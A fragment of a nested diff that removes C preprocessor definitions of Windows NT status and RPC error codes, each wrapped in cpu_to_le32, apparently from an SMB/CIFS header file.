+-#define STATUS_LPC_RECEIVE_BUFFER_EXPECTED cpu_to_le32(0xC0000705)
+-#define STATUS_LPC_INVALID_CONNECTION_USAGE cpu_to_le32(0xC0000706)
+-#define STATUS_LPC_REQUESTS_NOT_ALLOWED cpu_to_le32(0xC0000707)
+-#define STATUS_RESOURCE_IN_USE cpu_to_le32(0xC0000708)
+-#define STATUS_HARDWARE_MEMORY_ERROR cpu_to_le32(0xC0000709)
+-#define STATUS_THREADPOOL_HANDLE_EXCEPTION cpu_to_le32(0xC000070A)
+-#define STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED cpu_to_le32(0xC000070B)
+-#define STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED cpu_to_le32(0xC000070C)
+-#define STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED cpu_to_le32(0xC000070D)
+-#define STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED cpu_to_le32(0xC000070E)
+-#define STATUS_THREADPOOL_RELEASED_DURING_OPERATION cpu_to_le32(0xC000070F)
+-#define STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING cpu_to_le32(0xC0000710)
+-#define STATUS_APC_RETURNED_WHILE_IMPERSONATING cpu_to_le32(0xC0000711)
+-#define STATUS_PROCESS_IS_PROTECTED cpu_to_le32(0xC0000712)
+-#define STATUS_MCA_EXCEPTION cpu_to_le32(0xC0000713)
+-#define STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE cpu_to_le32(0xC0000714)
+-#define STATUS_SYMLINK_CLASS_DISABLED cpu_to_le32(0xC0000715)
+-#define STATUS_INVALID_IDN_NORMALIZATION cpu_to_le32(0xC0000716)
+-#define STATUS_NO_UNICODE_TRANSLATION cpu_to_le32(0xC0000717)
+-#define STATUS_ALREADY_REGISTERED cpu_to_le32(0xC0000718)
+-#define STATUS_CONTEXT_MISMATCH cpu_to_le32(0xC0000719)
+-#define STATUS_PORT_ALREADY_HAS_COMPLETION_LIST cpu_to_le32(0xC000071A)
+-#define STATUS_CALLBACK_RETURNED_THREAD_PRIORITY cpu_to_le32(0xC000071B)
+-#define STATUS_INVALID_THREAD cpu_to_le32(0xC000071C)
+-#define STATUS_CALLBACK_RETURNED_TRANSACTION cpu_to_le32(0xC000071D)
+-#define STATUS_CALLBACK_RETURNED_LDR_LOCK cpu_to_le32(0xC000071E)
+-#define STATUS_CALLBACK_RETURNED_LANG cpu_to_le32(0xC000071F)
+-#define STATUS_CALLBACK_RETURNED_PRI_BACK cpu_to_le32(0xC0000720)
+-#define STATUS_CALLBACK_RETURNED_THREAD_AFFINITY cpu_to_le32(0xC0000721)
+-#define STATUS_DISK_REPAIR_DISABLED cpu_to_le32(0xC0000800)
+-#define STATUS_DS_DOMAIN_RENAME_IN_PROGRESS cpu_to_le32(0xC0000801)
+-#define STATUS_DISK_QUOTA_EXCEEDED cpu_to_le32(0xC0000802)
+-#define STATUS_CONTENT_BLOCKED cpu_to_le32(0xC0000804)
+-#define STATUS_BAD_CLUSTERS cpu_to_le32(0xC0000805)
+-#define STATUS_VOLUME_DIRTY cpu_to_le32(0xC0000806)
+-#define STATUS_FILE_CHECKED_OUT cpu_to_le32(0xC0000901)
+-#define STATUS_CHECKOUT_REQUIRED cpu_to_le32(0xC0000902)
+-#define STATUS_BAD_FILE_TYPE cpu_to_le32(0xC0000903)
+-#define STATUS_FILE_TOO_LARGE cpu_to_le32(0xC0000904)
+-#define STATUS_FORMS_AUTH_REQUIRED cpu_to_le32(0xC0000905)
+-#define STATUS_VIRUS_INFECTED cpu_to_le32(0xC0000906)
+-#define STATUS_VIRUS_DELETED cpu_to_le32(0xC0000907)
+-#define STATUS_BAD_MCFG_TABLE cpu_to_le32(0xC0000908)
+-#define STATUS_WOW_ASSERTION cpu_to_le32(0xC0009898)
+-#define STATUS_INVALID_SIGNATURE cpu_to_le32(0xC000A000)
+-#define STATUS_HMAC_NOT_SUPPORTED cpu_to_le32(0xC000A001)
+-#define STATUS_IPSEC_QUEUE_OVERFLOW cpu_to_le32(0xC000A010)
+-#define STATUS_ND_QUEUE_OVERFLOW cpu_to_le32(0xC000A011)
+-#define STATUS_HOPLIMIT_EXCEEDED cpu_to_le32(0xC000A012)
+-#define STATUS_PROTOCOL_NOT_SUPPORTED cpu_to_le32(0xC000A013)
+-#define STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED cpu_to_le32(0xC000A080)
+-#define STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR cpu_to_le32(0xC000A081)
+-#define STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR cpu_to_le32(0xC000A082)
+-#define STATUS_XML_PARSE_ERROR cpu_to_le32(0xC000A083)
+-#define STATUS_XMLDSIG_ERROR cpu_to_le32(0xC000A084)
+-#define STATUS_WRONG_COMPARTMENT cpu_to_le32(0xC000A085)
+-#define STATUS_AUTHIP_FAILURE cpu_to_le32(0xC000A086)
+-#define DBG_NO_STATE_CHANGE cpu_to_le32(0xC0010001)
+-#define DBG_APP_NOT_IDLE cpu_to_le32(0xC0010002)
+-#define RPC_NT_INVALID_STRING_BINDING cpu_to_le32(0xC0020001)
+-#define RPC_NT_WRONG_KIND_OF_BINDING cpu_to_le32(0xC0020002)
+-#define RPC_NT_INVALID_BINDING cpu_to_le32(0xC0020003)
+-#define RPC_NT_PROTSEQ_NOT_SUPPORTED cpu_to_le32(0xC0020004)
+-#define RPC_NT_INVALID_RPC_PROTSEQ cpu_to_le32(0xC0020005)
+-#define RPC_NT_INVALID_STRING_UUID cpu_to_le32(0xC0020006)
+-#define RPC_NT_INVALID_ENDPOINT_FORMAT cpu_to_le32(0xC0020007)
+-#define RPC_NT_INVALID_NET_ADDR cpu_to_le32(0xC0020008)
+-#define RPC_NT_NO_ENDPOINT_FOUND cpu_to_le32(0xC0020009)
+-#define RPC_NT_INVALID_TIMEOUT cpu_to_le32(0xC002000A)
+-#define RPC_NT_OBJECT_NOT_FOUND cpu_to_le32(0xC002000B)
+-#define RPC_NT_ALREADY_REGISTERED cpu_to_le32(0xC002000C)
+-#define RPC_NT_TYPE_ALREADY_REGISTERED cpu_to_le32(0xC002000D)
+-#define RPC_NT_ALREADY_LISTENING cpu_to_le32(0xC002000E)
+-#define RPC_NT_NO_PROTSEQS_REGISTERED cpu_to_le32(0xC002000F)
+-#define RPC_NT_NOT_LISTENING cpu_to_le32(0xC0020010)
+-#define RPC_NT_UNKNOWN_MGR_TYPE cpu_to_le32(0xC0020011)
+-#define RPC_NT_UNKNOWN_IF cpu_to_le32(0xC0020012)
+-#define RPC_NT_NO_BINDINGS cpu_to_le32(0xC0020013)
+-#define RPC_NT_NO_PROTSEQS cpu_to_le32(0xC0020014)
+-#define RPC_NT_CANT_CREATE_ENDPOINT cpu_to_le32(0xC0020015)
+-#define RPC_NT_OUT_OF_RESOURCES cpu_to_le32(0xC0020016)
+-#define RPC_NT_SERVER_UNAVAILABLE cpu_to_le32(0xC0020017)
+-#define RPC_NT_SERVER_TOO_BUSY cpu_to_le32(0xC0020018)
+-#define RPC_NT_INVALID_NETWORK_OPTIONS cpu_to_le32(0xC0020019)
+-#define RPC_NT_NO_CALL_ACTIVE cpu_to_le32(0xC002001A)
+-#define RPC_NT_CALL_FAILED cpu_to_le32(0xC002001B)
+-#define RPC_NT_CALL_FAILED_DNE cpu_to_le32(0xC002001C)
+-#define RPC_NT_PROTOCOL_ERROR cpu_to_le32(0xC002001D)
+-#define RPC_NT_UNSUPPORTED_TRANS_SYN cpu_to_le32(0xC002001F)
+-#define RPC_NT_UNSUPPORTED_TYPE cpu_to_le32(0xC0020021)
+-#define RPC_NT_INVALID_TAG cpu_to_le32(0xC0020022)
+-#define RPC_NT_INVALID_BOUND cpu_to_le32(0xC0020023)
+-#define RPC_NT_NO_ENTRY_NAME cpu_to_le32(0xC0020024)
+-#define RPC_NT_INVALID_NAME_SYNTAX cpu_to_le32(0xC0020025)
+-#define RPC_NT_UNSUPPORTED_NAME_SYNTAX cpu_to_le32(0xC0020026)
+-#define RPC_NT_UUID_NO_ADDRESS cpu_to_le32(0xC0020028)
+-#define RPC_NT_DUPLICATE_ENDPOINT cpu_to_le32(0xC0020029)
+-#define RPC_NT_UNKNOWN_AUTHN_TYPE cpu_to_le32(0xC002002A)
+-#define RPC_NT_MAX_CALLS_TOO_SMALL cpu_to_le32(0xC002002B)
+-#define RPC_NT_STRING_TOO_LONG cpu_to_le32(0xC002002C)
+-#define RPC_NT_PROTSEQ_NOT_FOUND cpu_to_le32(0xC002002D)
+-#define RPC_NT_PROCNUM_OUT_OF_RANGE cpu_to_le32(0xC002002E)
+-#define RPC_NT_BINDING_HAS_NO_AUTH cpu_to_le32(0xC002002F)
+-#define RPC_NT_UNKNOWN_AUTHN_SERVICE cpu_to_le32(0xC0020030)
+-#define RPC_NT_UNKNOWN_AUTHN_LEVEL cpu_to_le32(0xC0020031)
+-#define RPC_NT_INVALID_AUTH_IDENTITY cpu_to_le32(0xC0020032)
+-#define RPC_NT_UNKNOWN_AUTHZ_SERVICE cpu_to_le32(0xC0020033)
+-#define EPT_NT_INVALID_ENTRY cpu_to_le32(0xC0020034)
+-#define EPT_NT_CANT_PERFORM_OP cpu_to_le32(0xC0020035)
+-#define EPT_NT_NOT_REGISTERED cpu_to_le32(0xC0020036)
+-#define RPC_NT_NOTHING_TO_EXPORT cpu_to_le32(0xC0020037)
+-#define RPC_NT_INCOMPLETE_NAME cpu_to_le32(0xC0020038)
+-#define RPC_NT_INVALID_VERS_OPTION cpu_to_le32(0xC0020039)
+-#define RPC_NT_NO_MORE_MEMBERS cpu_to_le32(0xC002003A)
+-#define RPC_NT_NOT_ALL_OBJS_UNEXPORTED cpu_to_le32(0xC002003B)
+-#define RPC_NT_INTERFACE_NOT_FOUND cpu_to_le32(0xC002003C)
+-#define RPC_NT_ENTRY_ALREADY_EXISTS cpu_to_le32(0xC002003D)
+-#define RPC_NT_ENTRY_NOT_FOUND cpu_to_le32(0xC002003E)
+-#define RPC_NT_NAME_SERVICE_UNAVAILABLE cpu_to_le32(0xC002003F)
+-#define RPC_NT_INVALID_NAF_ID cpu_to_le32(0xC0020040)
+-#define RPC_NT_CANNOT_SUPPORT cpu_to_le32(0xC0020041)
+-#define RPC_NT_NO_CONTEXT_AVAILABLE cpu_to_le32(0xC0020042)
+-#define RPC_NT_INTERNAL_ERROR cpu_to_le32(0xC0020043)
+-#define RPC_NT_ZERO_DIVIDE cpu_to_le32(0xC0020044)
+-#define RPC_NT_ADDRESS_ERROR cpu_to_le32(0xC0020045)
+-#define RPC_NT_FP_DIV_ZERO cpu_to_le32(0xC0020046)
+-#define RPC_NT_FP_UNDERFLOW cpu_to_le32(0xC0020047)
+-#define RPC_NT_FP_OVERFLOW cpu_to_le32(0xC0020048)
+-#define RPC_NT_CALL_IN_PROGRESS cpu_to_le32(0xC0020049)
+-#define RPC_NT_NO_MORE_BINDINGS cpu_to_le32(0xC002004A)
+-#define RPC_NT_GROUP_MEMBER_NOT_FOUND cpu_to_le32(0xC002004B)
+-#define EPT_NT_CANT_CREATE cpu_to_le32(0xC002004C)
+-#define RPC_NT_INVALID_OBJECT cpu_to_le32(0xC002004D)
+-#define RPC_NT_NO_INTERFACES cpu_to_le32(0xC002004F)
+-#define RPC_NT_CALL_CANCELLED cpu_to_le32(0xC0020050)
+-#define RPC_NT_BINDING_INCOMPLETE cpu_to_le32(0xC0020051)
+-#define RPC_NT_COMM_FAILURE cpu_to_le32(0xC0020052)
+-#define RPC_NT_UNSUPPORTED_AUTHN_LEVEL cpu_to_le32(0xC0020053)
+-#define RPC_NT_NO_PRINC_NAME cpu_to_le32(0xC0020054)
+-#define RPC_NT_NOT_RPC_ERROR cpu_to_le32(0xC0020055)
+-#define RPC_NT_SEC_PKG_ERROR cpu_to_le32(0xC0020057)
+-#define RPC_NT_NOT_CANCELLED cpu_to_le32(0xC0020058)
+-#define RPC_NT_INVALID_ASYNC_HANDLE cpu_to_le32(0xC0020062)
+-#define RPC_NT_INVALID_ASYNC_CALL cpu_to_le32(0xC0020063)
+-#define RPC_NT_PROXY_ACCESS_DENIED cpu_to_le32(0xC0020064)
+-#define RPC_NT_NO_MORE_ENTRIES cpu_to_le32(0xC0030001)
+-#define RPC_NT_SS_CHAR_TRANS_OPEN_FAIL cpu_to_le32(0xC0030002)
+-#define RPC_NT_SS_CHAR_TRANS_SHORT_FILE cpu_to_le32(0xC0030003)
+-#define RPC_NT_SS_IN_NULL_CONTEXT cpu_to_le32(0xC0030004)
+-#define RPC_NT_SS_CONTEXT_MISMATCH cpu_to_le32(0xC0030005)
+-#define RPC_NT_SS_CONTEXT_DAMAGED cpu_to_le32(0xC0030006)
+-#define RPC_NT_SS_HANDLES_MISMATCH cpu_to_le32(0xC0030007)
+-#define RPC_NT_SS_CANNOT_GET_CALL_HANDLE cpu_to_le32(0xC0030008)
+-#define RPC_NT_NULL_REF_POINTER cpu_to_le32(0xC0030009)
+-#define RPC_NT_ENUM_VALUE_OUT_OF_RANGE cpu_to_le32(0xC003000A)
+-#define RPC_NT_BYTE_COUNT_TOO_SMALL cpu_to_le32(0xC003000B)
+-#define RPC_NT_BAD_STUB_DATA cpu_to_le32(0xC003000C)
+-#define RPC_NT_INVALID_ES_ACTION cpu_to_le32(0xC0030059)
+-#define RPC_NT_WRONG_ES_VERSION cpu_to_le32(0xC003005A)
+-#define RPC_NT_WRONG_STUB_VERSION cpu_to_le32(0xC003005B)
+-#define RPC_NT_INVALID_PIPE_OBJECT cpu_to_le32(0xC003005C)
+-#define RPC_NT_INVALID_PIPE_OPERATION cpu_to_le32(0xC003005D)
+-#define RPC_NT_WRONG_PIPE_VERSION cpu_to_le32(0xC003005E)
+-#define RPC_NT_PIPE_CLOSED cpu_to_le32(0xC003005F)
+-#define RPC_NT_PIPE_DISCIPLINE_ERROR cpu_to_le32(0xC0030060)
+-#define RPC_NT_PIPE_EMPTY cpu_to_le32(0xC0030061)
+-#define STATUS_PNP_BAD_MPS_TABLE cpu_to_le32(0xC0040035)
+-#define STATUS_PNP_TRANSLATION_FAILED cpu_to_le32(0xC0040036)
+-#define STATUS_PNP_IRQ_TRANSLATION_FAILED cpu_to_le32(0xC0040037)
+-#define STATUS_PNP_INVALID_ID cpu_to_le32(0xC0040038)
+-#define STATUS_IO_REISSUE_AS_CACHED cpu_to_le32(0xC0040039)
+-#define STATUS_CTX_WINSTATION_NAME_INVALID cpu_to_le32(0xC00A0001)
+-#define STATUS_CTX_INVALID_PD cpu_to_le32(0xC00A0002)
+-#define STATUS_CTX_PD_NOT_FOUND cpu_to_le32(0xC00A0003)
+-#define STATUS_CTX_CLOSE_PENDING cpu_to_le32(0xC00A0006)
+-#define STATUS_CTX_NO_OUTBUF cpu_to_le32(0xC00A0007)
+-#define STATUS_CTX_MODEM_INF_NOT_FOUND cpu_to_le32(0xC00A0008)
+-#define STATUS_CTX_INVALID_MODEMNAME cpu_to_le32(0xC00A0009)
+-#define STATUS_CTX_RESPONSE_ERROR cpu_to_le32(0xC00A000A)
+-#define STATUS_CTX_MODEM_RESPONSE_TIMEOUT cpu_to_le32(0xC00A000B)
+-#define STATUS_CTX_MODEM_RESPONSE_NO_CARRIER cpu_to_le32(0xC00A000C)
+-#define STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE cpu_to_le32(0xC00A000D)
+-#define STATUS_CTX_MODEM_RESPONSE_BUSY cpu_to_le32(0xC00A000E)
+-#define STATUS_CTX_MODEM_RESPONSE_VOICE cpu_to_le32(0xC00A000F)
+-#define STATUS_CTX_TD_ERROR cpu_to_le32(0xC00A0010)
+-#define STATUS_CTX_LICENSE_CLIENT_INVALID cpu_to_le32(0xC00A0012)
+-#define STATUS_CTX_LICENSE_NOT_AVAILABLE cpu_to_le32(0xC00A0013)
+-#define STATUS_CTX_LICENSE_EXPIRED cpu_to_le32(0xC00A0014)
+-#define STATUS_CTX_WINSTATION_NOT_FOUND cpu_to_le32(0xC00A0015)
+-#define STATUS_CTX_WINSTATION_NAME_COLLISION cpu_to_le32(0xC00A0016)
+-#define STATUS_CTX_WINSTATION_BUSY cpu_to_le32(0xC00A0017)
+-#define STATUS_CTX_BAD_VIDEO_MODE cpu_to_le32(0xC00A0018)
+-#define STATUS_CTX_GRAPHICS_INVALID cpu_to_le32(0xC00A0022)
+-#define STATUS_CTX_NOT_CONSOLE cpu_to_le32(0xC00A0024)
+-#define STATUS_CTX_CLIENT_QUERY_TIMEOUT cpu_to_le32(0xC00A0026)
+-#define STATUS_CTX_CONSOLE_DISCONNECT cpu_to_le32(0xC00A0027)
+-#define STATUS_CTX_CONSOLE_CONNECT cpu_to_le32(0xC00A0028)
+-#define STATUS_CTX_SHADOW_DENIED cpu_to_le32(0xC00A002A)
+-#define STATUS_CTX_WINSTATION_ACCESS_DENIED cpu_to_le32(0xC00A002B)
+-#define STATUS_CTX_INVALID_WD cpu_to_le32(0xC00A002E)
+-#define STATUS_CTX_WD_NOT_FOUND cpu_to_le32(0xC00A002F)
+-#define STATUS_CTX_SHADOW_INVALID cpu_to_le32(0xC00A0030)
+-#define STATUS_CTX_SHADOW_DISABLED cpu_to_le32(0xC00A0031)
+-#define STATUS_RDP_PROTOCOL_ERROR cpu_to_le32(0xC00A0032)
+-#define STATUS_CTX_CLIENT_LICENSE_NOT_SET cpu_to_le32(0xC00A0033)
+-#define STATUS_CTX_CLIENT_LICENSE_IN_USE cpu_to_le32(0xC00A0034)
+-#define STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE cpu_to_le32(0xC00A0035)
+-#define STATUS_CTX_SHADOW_NOT_RUNNING cpu_to_le32(0xC00A0036)
+-#define STATUS_CTX_LOGON_DISABLED cpu_to_le32(0xC00A0037)
+-#define STATUS_CTX_SECURITY_LAYER_ERROR cpu_to_le32(0xC00A0038)
+-#define STATUS_TS_INCOMPATIBLE_SESSIONS cpu_to_le32(0xC00A0039)
+-#define STATUS_MUI_FILE_NOT_FOUND cpu_to_le32(0xC00B0001)
+-#define STATUS_MUI_INVALID_FILE cpu_to_le32(0xC00B0002)
+-#define STATUS_MUI_INVALID_RC_CONFIG cpu_to_le32(0xC00B0003)
+-#define STATUS_MUI_INVALID_LOCALE_NAME cpu_to_le32(0xC00B0004)
+-#define STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME cpu_to_le32(0xC00B0005)
+-#define STATUS_MUI_FILE_NOT_LOADED cpu_to_le32(0xC00B0006)
+-#define STATUS_RESOURCE_ENUM_USER_STOP cpu_to_le32(0xC00B0007)
+-#define STATUS_CLUSTER_INVALID_NODE cpu_to_le32(0xC0130001)
+-#define STATUS_CLUSTER_NODE_EXISTS cpu_to_le32(0xC0130002)
+-#define STATUS_CLUSTER_JOIN_IN_PROGRESS cpu_to_le32(0xC0130003)
+-#define STATUS_CLUSTER_NODE_NOT_FOUND cpu_to_le32(0xC0130004)
+-#define STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND cpu_to_le32(0xC0130005)
+-#define STATUS_CLUSTER_NETWORK_EXISTS cpu_to_le32(0xC0130006)
+-#define STATUS_CLUSTER_NETWORK_NOT_FOUND cpu_to_le32(0xC0130007)
+-#define STATUS_CLUSTER_NETINTERFACE_EXISTS cpu_to_le32(0xC0130008)
+-#define STATUS_CLUSTER_NETINTERFACE_NOT_FOUND cpu_to_le32(0xC0130009)
+-#define STATUS_CLUSTER_INVALID_REQUEST cpu_to_le32(0xC013000A)
+-#define STATUS_CLUSTER_INVALID_NETWORK_PROVIDER cpu_to_le32(0xC013000B)
+-#define STATUS_CLUSTER_NODE_DOWN cpu_to_le32(0xC013000C)
+-#define STATUS_CLUSTER_NODE_UNREACHABLE cpu_to_le32(0xC013000D)
+-#define STATUS_CLUSTER_NODE_NOT_MEMBER cpu_to_le32(0xC013000E)
+-#define STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS cpu_to_le32(0xC013000F)
+-#define STATUS_CLUSTER_INVALID_NETWORK cpu_to_le32(0xC0130010)
+-#define STATUS_CLUSTER_NO_NET_ADAPTERS cpu_to_le32(0xC0130011)
+-#define STATUS_CLUSTER_NODE_UP cpu_to_le32(0xC0130012)
+-#define STATUS_CLUSTER_NODE_PAUSED cpu_to_le32(0xC0130013)
+-#define STATUS_CLUSTER_NODE_NOT_PAUSED cpu_to_le32(0xC0130014)
+-#define STATUS_CLUSTER_NO_SECURITY_CONTEXT cpu_to_le32(0xC0130015)
+-#define STATUS_CLUSTER_NETWORK_NOT_INTERNAL cpu_to_le32(0xC0130016)
+-#define STATUS_CLUSTER_POISONED cpu_to_le32(0xC0130017)
+-#define STATUS_ACPI_INVALID_OPCODE cpu_to_le32(0xC0140001)
+-#define STATUS_ACPI_STACK_OVERFLOW cpu_to_le32(0xC0140002)
+-#define STATUS_ACPI_ASSERT_FAILED cpu_to_le32(0xC0140003)
+-#define STATUS_ACPI_INVALID_INDEX cpu_to_le32(0xC0140004)
+-#define STATUS_ACPI_INVALID_ARGUMENT cpu_to_le32(0xC0140005)
+-#define STATUS_ACPI_FATAL cpu_to_le32(0xC0140006)
+-#define STATUS_ACPI_INVALID_SUPERNAME cpu_to_le32(0xC0140007)
+-#define STATUS_ACPI_INVALID_ARGTYPE cpu_to_le32(0xC0140008)
+-#define STATUS_ACPI_INVALID_OBJTYPE cpu_to_le32(0xC0140009)
+-#define STATUS_ACPI_INVALID_TARGETTYPE cpu_to_le32(0xC014000A)
+-#define STATUS_ACPI_INCORRECT_ARGUMENT_COUNT cpu_to_le32(0xC014000B)
+-#define STATUS_ACPI_ADDRESS_NOT_MAPPED cpu_to_le32(0xC014000C)
+-#define STATUS_ACPI_INVALID_EVENTTYPE cpu_to_le32(0xC014000D)
+-#define STATUS_ACPI_HANDLER_COLLISION cpu_to_le32(0xC014000E)
+-#define STATUS_ACPI_INVALID_DATA cpu_to_le32(0xC014000F)
+-#define STATUS_ACPI_INVALID_REGION cpu_to_le32(0xC0140010)
+-#define STATUS_ACPI_INVALID_ACCESS_SIZE cpu_to_le32(0xC0140011)
+-#define STATUS_ACPI_ACQUIRE_GLOBAL_LOCK cpu_to_le32(0xC0140012)
+-#define STATUS_ACPI_ALREADY_INITIALIZED cpu_to_le32(0xC0140013)
+-#define STATUS_ACPI_NOT_INITIALIZED cpu_to_le32(0xC0140014)
+-#define STATUS_ACPI_INVALID_MUTEX_LEVEL cpu_to_le32(0xC0140015)
+-#define STATUS_ACPI_MUTEX_NOT_OWNED cpu_to_le32(0xC0140016)
+-#define STATUS_ACPI_MUTEX_NOT_OWNER cpu_to_le32(0xC0140017)
+-#define STATUS_ACPI_RS_ACCESS cpu_to_le32(0xC0140018)
+-#define STATUS_ACPI_INVALID_TABLE cpu_to_le32(0xC0140019)
+-#define STATUS_ACPI_REG_HANDLER_FAILED cpu_to_le32(0xC0140020)
+-#define STATUS_ACPI_POWER_REQUEST_FAILED cpu_to_le32(0xC0140021)
+-#define STATUS_SXS_SECTION_NOT_FOUND cpu_to_le32(0xC0150001)
+-#define STATUS_SXS_CANT_GEN_ACTCTX cpu_to_le32(0xC0150002)
+-#define STATUS_SXS_INVALID_ACTCTXDATA_FORMAT cpu_to_le32(0xC0150003)
+-#define STATUS_SXS_ASSEMBLY_NOT_FOUND cpu_to_le32(0xC0150004)
+-#define STATUS_SXS_MANIFEST_FORMAT_ERROR cpu_to_le32(0xC0150005)
+-#define STATUS_SXS_MANIFEST_PARSE_ERROR cpu_to_le32(0xC0150006)
+-#define STATUS_SXS_ACTIVATION_CONTEXT_DISABLED cpu_to_le32(0xC0150007)
+-#define STATUS_SXS_KEY_NOT_FOUND cpu_to_le32(0xC0150008)
+-#define STATUS_SXS_VERSION_CONFLICT cpu_to_le32(0xC0150009)
+-#define STATUS_SXS_WRONG_SECTION_TYPE cpu_to_le32(0xC015000A)
+-#define STATUS_SXS_THREAD_QUERIES_DISABLED cpu_to_le32(0xC015000B)
+-#define STATUS_SXS_ASSEMBLY_MISSING cpu_to_le32(0xC015000C)
+-#define STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET cpu_to_le32(0xC015000E)
+-#define STATUS_SXS_EARLY_DEACTIVATION cpu_to_le32(0xC015000F)
+-#define STATUS_SXS_INVALID_DEACTIVATION cpu_to_le32(0xC0150010)
+-#define STATUS_SXS_MULTIPLE_DEACTIVATION cpu_to_le32(0xC0150011)
+-#define STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY cpu_to_le32(0xC0150012)
+-#define STATUS_SXS_PROCESS_TERMINATION_REQUESTED cpu_to_le32(0xC0150013)
+-#define STATUS_SXS_CORRUPT_ACTIVATION_STACK cpu_to_le32(0xC0150014)
+-#define STATUS_SXS_CORRUPTION cpu_to_le32(0xC0150015)
+-#define STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE cpu_to_le32(0xC0150016)
+-#define STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME cpu_to_le32(0xC0150017)
+-#define STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE cpu_to_le32(0xC0150018)
+-#define STATUS_SXS_IDENTITY_PARSE_ERROR cpu_to_le32(0xC0150019)
+-#define STATUS_SXS_COMPONENT_STORE_CORRUPT cpu_to_le32(0xC015001A)
+-#define STATUS_SXS_FILE_HASH_MISMATCH cpu_to_le32(0xC015001B)
+-#define STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT cpu_to_le32(0xC015001C)
+-#define STATUS_SXS_IDENTITIES_DIFFERENT cpu_to_le32(0xC015001D)
+-#define STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT cpu_to_le32(0xC015001E)
+-#define STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY cpu_to_le32(0xC015001F)
+-#define STATUS_ADVANCED_INSTALLER_FAILED cpu_to_le32(0xC0150020)
+-#define STATUS_XML_ENCODING_MISMATCH cpu_to_le32(0xC0150021)
+-#define STATUS_SXS_MANIFEST_TOO_BIG cpu_to_le32(0xC0150022)
+-#define STATUS_SXS_SETTING_NOT_REGISTERED cpu_to_le32(0xC0150023)
+-#define STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE cpu_to_le32(0xC0150024)
+-#define STATUS_SMI_PRIMITIVE_INSTALLER_FAILED cpu_to_le32(0xC0150025)
+-#define STATUS_GENERIC_COMMAND_FAILED cpu_to_le32(0xC0150026)
+-#define STATUS_SXS_FILE_HASH_MISSING cpu_to_le32(0xC0150027)
+-#define STATUS_TRANSACTIONAL_CONFLICT cpu_to_le32(0xC0190001)
+-#define STATUS_INVALID_TRANSACTION cpu_to_le32(0xC0190002)
+-#define STATUS_TRANSACTION_NOT_ACTIVE cpu_to_le32(0xC0190003)
+-#define STATUS_TM_INITIALIZATION_FAILED cpu_to_le32(0xC0190004)
+-#define STATUS_RM_NOT_ACTIVE cpu_to_le32(0xC0190005)
+-#define STATUS_RM_METADATA_CORRUPT cpu_to_le32(0xC0190006)
+-#define STATUS_TRANSACTION_NOT_JOINED cpu_to_le32(0xC0190007)
+-#define STATUS_DIRECTORY_NOT_RM cpu_to_le32(0xC0190008)
+-#define STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE cpu_to_le32(0xC019000A)
+-#define STATUS_LOG_RESIZE_INVALID_SIZE cpu_to_le32(0xC019000B)
+-#define STATUS_REMOTE_FILE_VERSION_MISMATCH cpu_to_le32(0xC019000C)
+-#define STATUS_CRM_PROTOCOL_ALREADY_EXISTS cpu_to_le32(0xC019000F)
+-#define STATUS_TRANSACTION_PROPAGATION_FAILED cpu_to_le32(0xC0190010)
+-#define STATUS_CRM_PROTOCOL_NOT_FOUND cpu_to_le32(0xC0190011)
+-#define STATUS_TRANSACTION_SUPERIOR_EXISTS cpu_to_le32(0xC0190012)
+-#define STATUS_TRANSACTION_REQUEST_NOT_VALID cpu_to_le32(0xC0190013)
+-#define STATUS_TRANSACTION_NOT_REQUESTED cpu_to_le32(0xC0190014)
+-#define STATUS_TRANSACTION_ALREADY_ABORTED cpu_to_le32(0xC0190015)
+-#define STATUS_TRANSACTION_ALREADY_COMMITTED cpu_to_le32(0xC0190016)
+-#define STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER cpu_to_le32(0xC0190017)
+-#define STATUS_CURRENT_TRANSACTION_NOT_VALID cpu_to_le32(0xC0190018)
+-#define STATUS_LOG_GROWTH_FAILED cpu_to_le32(0xC0190019)
+-#define STATUS_OBJECT_NO_LONGER_EXISTS cpu_to_le32(0xC0190021)
+-#define STATUS_STREAM_MINIVERSION_NOT_FOUND cpu_to_le32(0xC0190022)
+-#define STATUS_STREAM_MINIVERSION_NOT_VALID cpu_to_le32(0xC0190023)
+-#define STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION cpu_to_le32(0xC0190024)
+-#define STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT cpu_to_le32(0xC0190025)
+-#define STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS cpu_to_le32(0xC0190026)
+-#define STATUS_HANDLE_NO_LONGER_VALID cpu_to_le32(0xC0190028)
+-#define STATUS_LOG_CORRUPTION_DETECTED cpu_to_le32(0xC0190030)
+-#define STATUS_RM_DISCONNECTED cpu_to_le32(0xC0190032)
+-#define STATUS_ENLISTMENT_NOT_SUPERIOR cpu_to_le32(0xC0190033)
+-#define STATUS_FILE_IDENTITY_NOT_PERSISTENT cpu_to_le32(0xC0190036)
+-#define STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY cpu_to_le32(0xC0190037)
